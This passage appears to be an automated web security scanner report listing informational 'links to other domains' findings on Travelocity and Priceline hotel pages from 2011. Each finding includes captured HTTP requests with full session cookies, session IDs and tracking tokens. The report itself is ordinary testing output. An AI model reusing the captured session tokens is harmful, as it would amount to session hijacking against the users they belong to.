Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688; pux=1022%3D15352%261185%3D15232%261197%3D15352%261430%3D15352%261512%3D15232%261902%3D15352%261986%3D15232%261994%3D15352%262025%3D15352%262046%3D15232%262081%3D15352%262084%3D15352%262100%3D15352%262101%3D15232%262132%3D15352%262135%3D15352%262211%3D15352%262245%3D15352%262249%3D15352%262271%3D15352%26fimservePS%3D15232%26w55c%3D15352%261523ext%3D15352%262211ext%3D15352%26; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=8154/13209; rdk1=0; ses1=13209^1; csi1=3226251.js^1^1317599333^1317599333

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Last-Modified: Sun, 02 Oct 2011 07:27:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9327
Cache-Control: max-age=600
Expires: Sun, 02 Oct 2011 23:58:54 GMT
Date: Sun, 02 Oct 2011 23:48:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!-- Copyright the Rubicon Project 2010 -->


<html>
<head>
<title></title>
</head>
<
...[SNIP]...
</script>
<img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>


</body>
...[SNIP]...
19.168. http://travel.travelocity.com/hotel/HotelAvailability.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.2.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:47 GMT
Server: Apache
Set-Cookie: JSID=C3B4C0033B2F65D5EA7EF7750A5F38F6.p0742; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 90909

<!--
JSESSIONID = C3B4C0033B2F65D5EA7EF7750A5F38F6.p0742
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var jsessionid="C3B4C0033B2F65D5EA7EF77
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/reset-min.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/headerfooter_v1.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/global.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_v3.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/hotels.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/HF_hotels_overrides.css"/>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/navigation.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/global.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/hotels.js"></script>
...[SNIP]...
</script> <link type="text/css" href="http://i.travelpn.com.edgesuite.net/jQuery/themes/base/ui.core.css" rel="stylesheet" />
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/jQuery/themes/base/ui.theme.css" rel="stylesheet" />
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_datepicker.css" rel="stylesheet" />
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/jquery.min.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/ui/jquery.ui.core.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/calendar_datepicker.js"></script>
...[SNIP]...
<body id="hot" onload="javascript:on_load();" >
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/mbox.js"></script>
...[SNIP]...
<li><a onClick="feedback();return false;" href="http://travelpn.qualtrics.com/SE/?SID=SV_802MeVVezJbOvVW" title="Feedback" id="feedback">Feedback</a>
...[SNIP]...
<a href="http://www.travelocity.com/" title="Travelocity"><img src="http://i.travelpn.com.edgesuite.net/images/graphics/travelocity-logo228x69.gif" name="HeaderLogoNew" border="0" alt="Travelocity Logo"></a>
...[SNIP]...
<div class="a_content"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/alertSM.gif" name="AlertSM" height="13" width="12" border="0"><h4>
...[SNIP]...
<li><a href="http://www.roaminggnomestore.com/" title="Gnome Store" rel="nofollow">Gnome Store</a>
...[SNIP]...
<li class="sprite-au_sm"><a href="http://www.zuji.com.au/site/travel/hotels/" title="Australia">Australia</a></li>
<li class="sprite-ca_sm"><a href="http://www.travelocity.ca/ca/hotels" title="Canada">Canada</a></li>
<li class="sprite-cl_sm"><a href="http://www.allhotels.cl/" title="Chile">Chile</a></li>
<li class="sprite-co_sm"><a href="http://www.allhotels.com.co/" title="Colombia">Colombia</a></li>
<li class="sprite-cr_sm"><a href="http://www.allhotels.co.cr/" title="Costa Rica">Costa Rica</a>
...[SNIP]...
<li class="sprite-dk_sm"><a href="http://www.rejsefeber.dk/dk/hotel/" title="Denmark">Denmark</a></li>

<li class="sprite-ec_sm"><a href="http://www.allhotels.com.ec/" title="Ecuador">Ecuador</a></li>
<li class="sprite-fr_sm"><a href="http://www.fr.lastminute.com/site/voyages/reservation-hotels/" title="France">France</a></li>
<li class="sprite-de_sm"><a href="http://www.lastminute.de/de_DE/lmn2/travel/hotel/new.do" title="Germany">Germany</a></li>
<li class="sprite-hk_sm"><a href="http://www.zuji.com.hk/site/travel/hotels/" title="Hong Kong">Hong Kong</a>
...[SNIP]...
<li class="sprite-ie_sm"><a href="http://www.lastminute.ie/site/travel/hotels/" title="Ireland">Ireland</a></li>
<li class="sprite-it_sm"><a href="http://www.it.lastminute.com/site/viaggi/hotels/" title="Italy">Italy</a></li>
<li class="sprite-kp_sm"><a href="http://www.nextour.co.kr/" title="Korea">Korea</a>
...[SNIP]...
<li class="sprite-no_sm"><a href="http://www.reisefeber.no/no/hotel/" title="Norway">Norway</a></li>
<li class="sprite-py_sm"><a href="http://www.allhotels.com.py/" title="Paraguay">Paraguay</a></li>
<li class="sprite-pe_sm"><a href="http://www.allhotels.pe/" title="Peru">Peru</a></li>
<li class="sprite-sg_sm"><a href="http://www.zuji.com.sg/site/travel/hotels/" title="Singapore">Singapore</a></li>
<li class="sprite-es_sm"><a href="http://www.es.lastminute.com/site/viajes/hoteles/" title="Spain">Spain</a></li>
<li class="sprite-se_sm"><a href="http://www.resfeber.se/se/hotel/" title="Sweden">Sweden</a>
...[SNIP]...
<li class="sprite-uy_sm"><a href="http://www.allhotels.com.uy/" title="Uruguay">Uruguay</a></li>
<li class="sprite-ve_sm last"><a href="http://www.allhotels.co.ve/" title="Venezuela">Venezuela</a>
...[SNIP]...
<li class="first"><a href="http://www.allhotels.com/" title="All Hotels">All Hotels</a>
...[SNIP]...
<li><a href="http://www.holidayautos.co.uk/" title="holiday autos">holiday autos</a>
...[SNIP]...
<li><a href="http://www.igougo.com/" title="IgoUgo&reg;">IgoUgo&reg;</a>
...[SNIP]...
<li><a href="http://www.travelguru.com/" title="Travel Guru">Travel Guru</a>
...[SNIP]...
<li><a href="http://www.vacations.com/" title="Vacations.com">Vacations.com</a>
...[SNIP]...
<li><a href="http://www.windowseatblog.com/" title="Window Seat Blog">Window Seat Blog</a>
...[SNIP]...
<li><a href="http://www.worldchoicetravel.com/" title="World Choice Travel&reg;" rel="nofollow">World Choice Travel&reg;</a>
...[SNIP]...
<li class="last"><a href="http://www.zuji.com/" title="Zuji">Zuji</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=75787&p=irol-news&nyo=0" title="Press Releases">Press Releases</a>
...[SNIP]...
<li><a href="http://www.travelocitybusiness.com" title="Travelocity Business">Travelocity Business</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/tracking_tags_US.js"></script>
...[SNIP]...
19.169. http://travel.travelocity.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelCobrand.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/HotelCobrand.do?Service=TRAVELOCITY&SearchPath=hots&old_cb=N&mode=1&x=53&y=14pax_cnt=2&city=&state=&dateLeavingMonth=10&dateLeavingDay=9&dateReturningMonth=10&dateReturningDay=16&adults=1&children=0&WA1=03010&WA2=away.com&WA3=cpc&WA4=45&WA5=trave_hotelbookingtab_awy_|u&WA6=hot&WA8=|,, HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:43 GMT
Server: Apache
Set-Cookie: JSID=CFC4461E78A68A9B3D607597C3371103.p0739; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = CFC4461E78A68A9B3D607597C3371103.p0739
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/swfobject.js"></script>
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/global.css"/>
</head>
...[SNIP]...
<h1><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/tk_title_hotel.gif" name="TimeKeeperTitleHotel" border="0"></h1>
...[SNIP]...
<div id="progress"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/tk_progress.gif" name="TimeKeeperProgressGif" border="0"></div>
...[SNIP]...
<div id="tips"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/tk_did_you_know.gif" name="TimeKeeperDidYouKnow" border="0"></div>
...[SNIP]...
19.170. http://travel.travelocity.com/hotel/HotelDetail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/reset-min.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/headerfooter_v1.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/global.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_v3.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/hotels.css"/>
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/HF_hotels_overrides.css"/>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/navigation.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/global.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/hotels.js"></script>
...[SNIP]...
</script> <link type="text/css" href="http://i.travelpn.com.edgesuite.net/jQuery/themes/base/ui.core.css" rel="stylesheet" />
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/jQuery/themes/base/ui.theme.css" rel="stylesheet" />
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_datepicker.css" rel="stylesheet" />
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/jquery.min.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/ui/jquery.ui.core.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/calendar_datepicker.js"></script>
...[SNIP]...
<body id="hot" class="hotdet" onload="on_load_search();reloadEvents('workspace')" >
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/mbox.js"></script>
...[SNIP]...
<li><a onClick="feedback();return false;" href="http://travelpn.qualtrics.com/SE/?SID=SV_802MeVVezJbOvVW" title="Feedback" id="feedback">Feedback</a>
...[SNIP]...
<a href="http://www.travelocity.com/" title="Travelocity"><img src="http://i.travelpn.com.edgesuite.net/images/graphics/travelocity-logo228x69.gif" name="HeaderLogoNew" border="0" alt="Travelocity Logo"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://travelocity.ugc.bazaarvoice.com/static/0025-en_us/bvapi.js"></script>
...[SNIP]...
<div class="details" style="width: 350px">
<img src="http://i.travelocity.com.edgesuite.net/legacy/logos/ht_omlogo.gif" class="logo"><p>
...[SNIP]...
<a href="/hotel/HotelDetailReviewRead.do?propertyId=4810&reviewFromIndex=0&tipFromIndex=0&tipsPage=false&travelerCategory=All&reviewPage=&tab=read&fromPage=" onclick="bDspExit=false;"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/icon_tvlrRate_lg_4-0.gif" name="iconTvlrRateLg_4-0" border="0" alt="4-0"></a>
...[SNIP]...
<a href="javascript:print();"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/icon_print.gif" name="Printer" height="15" width="20" border="0" alt="Print this page"></a>
...[SNIP]...
<!-- ClickToCall enabled -->
<script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...
<div class="a_content">
       <img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/alertSM.gif" name="AlertSM" height="13" width="12" border="0"><h4>
...[SNIP]...
PageName=HotelHelpMultiRoom" onclick="o_help = window.open(this.href, 'title', 'toolbar=no,status=no,scrollbars=yes,resizable=yes,width=500,height=400');if(!o_help.closed)o_help.focus();return false;"><img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/question.gif" name="question" height="12" width="12" border="0" class="helpimg"></a>
...[SNIP]...
<div class="a_content">
       <img src="http://i.travelocity.com.edgesuite.net/legacy/graphics/alertSM.gif" name="AlertSM" height="13" width="12" border="0"><h4>
...[SNIP]...
<li><a href="http://www.roaminggnomestore.com/" title="Gnome Store" rel="nofollow">Gnome Store</a>
...[SNIP]...
<li class="sprite-au_sm"><a href="http://www.zuji.com.au/site/travel/hotels/" title="Australia">Australia</a></li>
<li class="sprite-ca_sm"><a href="http://www.travelocity.ca/ca/hotels" title="Canada">Canada</a></li>
<li class="sprite-cl_sm"><a href="http://www.allhotels.cl/" title="Chile">Chile</a></li>
<li class="sprite-co_sm"><a href="http://www.allhotels.com.co/" title="Colombia">Colombia</a></li>
<li class="sprite-cr_sm"><a href="http://www.allhotels.co.cr/" title="Costa Rica">Costa Rica</a>
...[SNIP]...
<li class="sprite-dk_sm"><a href="http://www.rejsefeber.dk/dk/hotel/" title="Denmark">Denmark</a></li>

<li class="sprite-ec_sm"><a href="http://www.allhotels.com.ec/" title="Ecuador">Ecuador</a></li>
<li class="sprite-fr_sm"><a href="http://www.fr.lastminute.com/site/voyages/reservation-hotels/" title="France">France</a></li>
<li class="sprite-de_sm"><a href="http://www.lastminute.de/de_DE/lmn2/travel/hotel/new.do" title="Germany">Germany</a></li>
<li class="sprite-hk_sm"><a href="http://www.zuji.com.hk/site/travel/hotels/" title="Hong Kong">Hong Kong</a>
...[SNIP]...
<li class="sprite-ie_sm"><a href="http://www.lastminute.ie/site/travel/hotels/" title="Ireland">Ireland</a></li>
<li class="sprite-it_sm"><a href="http://www.it.lastminute.com/site/viaggi/hotels/" title="Italy">Italy</a></li>
<li class="sprite-kp_sm"><a href="http://www.nextour.co.kr/" title="Korea">Korea</a>
...[SNIP]...
<li class="sprite-no_sm"><a href="http://www.reisefeber.no/no/hotel/" title="Norway">Norway</a></li>
<li class="sprite-py_sm"><a href="http://www.allhotels.com.py/" title="Paraguay">Paraguay</a></li>
<li class="sprite-pe_sm"><a href="http://www.allhotels.pe/" title="Peru">Peru</a></li>
<li class="sprite-sg_sm"><a href="http://www.zuji.com.sg/site/travel/hotels/" title="Singapore">Singapore</a></li>
<li class="sprite-es_sm"><a href="http://www.es.lastminute.com/site/viajes/hoteles/" title="Spain">Spain</a></li>
<li class="sprite-se_sm"><a href="http://www.resfeber.se/se/hotel/" title="Sweden">Sweden</a>
...[SNIP]...
<li class="sprite-uy_sm"><a href="http://www.allhotels.com.uy/" title="Uruguay">Uruguay</a></li>
<li class="sprite-ve_sm last"><a href="http://www.allhotels.co.ve/" title="Venezuela">Venezuela</a>
...[SNIP]...
<li class="first"><a href="http://www.allhotels.com/" title="All Hotels">All Hotels</a>
...[SNIP]...
<li><a href="http://www.holidayautos.co.uk/" title="holiday autos">holiday autos</a>
...[SNIP]...
<li><a href="http://www.igougo.com/" title="IgoUgo&reg;">IgoUgo&reg;</a>
...[SNIP]...
<li><a href="http://www.travelguru.com/" title="Travel Guru">Travel Guru</a>
...[SNIP]...
<li><a href="http://www.vacations.com/" title="Vacations.com">Vacations.com</a>
...[SNIP]...
<li><a href="http://www.windowseatblog.com/" title="Window Seat Blog">Window Seat Blog</a>
...[SNIP]...
<li><a href="http://www.worldchoicetravel.com/" title="World Choice Travel&reg;" rel="nofollow">World Choice Travel&reg;</a>
...[SNIP]...
<li class="last"><a href="http://www.zuji.com/" title="Zuji">Zuji</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=75787&p=irol-news&nyo=0" title="Press Releases">Press Releases</a>
...[SNIP]...
<li><a href="http://www.travelocitybusiness.com" title="Travelocity Business">Travelocity Business</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/tracking_tags_US.js"></script>
...[SNIP]...
19.171. http://travela.priceline.com/hotel/newHotelSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 192
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:37 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8F1936C519E8273F266A95D7A4654200; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491027


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<NOSCRIPT>
   <A HREF="http://ad.doubleclick.net/N3102/jump/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=9086217658034619?">
   <IMG SRC="http://ad.doubleclick.net/N3102/ad/priceline.dart/hotel_search_results;city=boston;state=massachusetts;country=united_states;sz=728x90;ord=9086217658034619?" border="0" height="90" width="728" alt=""></A>
...[SNIP]...
<li class="last"><a href="http://findgroupdeals.hotelplanner.com/Priceline.cfm?sc=PCLN_HomeTopNav">groups</a>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<div class="app">
       <a href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=336381998&amp;mt=8" onclick="gf_CallExitTracker('/3v3nt/default/nav_bottom/click/iphoneapp');" target="_blank">
       <img width="98" height="34" border="0" src="/hotel/content/graphics/iphone-badge.gif" alt="available on the App Store"/>
...[SNIP]...
